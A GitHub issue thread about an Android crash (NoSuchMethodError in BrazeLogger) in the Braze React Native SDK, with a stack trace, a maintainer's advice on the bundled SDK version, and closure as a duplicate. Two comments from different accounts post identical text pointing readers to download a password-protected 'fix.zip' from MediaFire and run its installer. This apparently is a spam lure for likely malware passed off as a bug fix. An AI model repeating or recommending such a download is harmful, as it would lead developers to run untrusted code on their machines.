### ISSUE TITLE
[Bug]: 

### ISSUE THREAD

**Issue by Akeuuh** [braze-inc/braze-react-native-sdk#265]
### Which Platforms?

Android

### Which React Native Version?

0.73.6

### Which @braze/react-native-sdk SDK version?

11.0.0

### Repro Rate

100%

### Steps To Reproduce

Build the android app and launch it

### Expected Behavior

Supposed to launch the app successfully

### Actual Incorrect Behavior

The app crash with the following log from adb logcat

```
FATAL EXCEPTION: main
Process: XXX, PID: 9727
java.lang.NoSuchMethodError: No static method brazelog$default(Lcom/braze/support/BrazeLogger;Ljava/lang/Object;Lcom/braze/support/BrazeLogger$Priority;Ljava/lang/Throwable;Lkotlin/jvm/functions/Function0;ILjava/lang/Object;)V in class Lcom/braze/support/BrazeLogger; or its super classes (declaration of 'com.braze.support.BrazeLogger' appears in /data/app/~~N4_sBLGMp9wu74z2CRhvhA==/XXX-DIOIgIHN8ZMF_SZ3gUBMFQ==/base.apk!classes7.dex)
	at com.braze.BrazeActivityLifecycleCallbackListener.<init>(BrazeActivityLifecycleCallbackListener.kt:47)
	at com.braze.BrazeActivityLifecycleCallbackListener.<init>(BrazeActivityLifecycleCallbackListener.kt:34)
	at XXX.MainApplication.onCreate(MainApplication.kt:51)
	at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1316)
	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:6998)
	at android.app.ActivityThread.-$$Nest$mhandleBindApplication(Unknown Source:0)
	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2236)
	at android.os.Handler.dispatchMessage(Handler.java:106)
	at android.os.Looper.loopOnce(Looper.java:205)
	at android.os.Looper.loop(Looper.java:294)
	at android.app.ActivityThread.main(ActivityThread.java:8177)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:552)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:971)
```

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bryanlogan** [comment]
Are you updating the version of `com.braze:android-sdk-ui` yourself? You should just be using the version that ships with the wrapper.

https://www.braze.com/docs/developer_guide/platform_integration_guides/android/initial_sdk_setup/android_sdk_integration/#basic-integration

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by radixdev** [comment]
Closing as duplicate. Please see https://github.com/braze-inc/braze-react-native-sdk/issues/264#issuecomment-2313600717

**Comment by Akeuuh** [comment]
Thanks for pointing this issue @radixdev
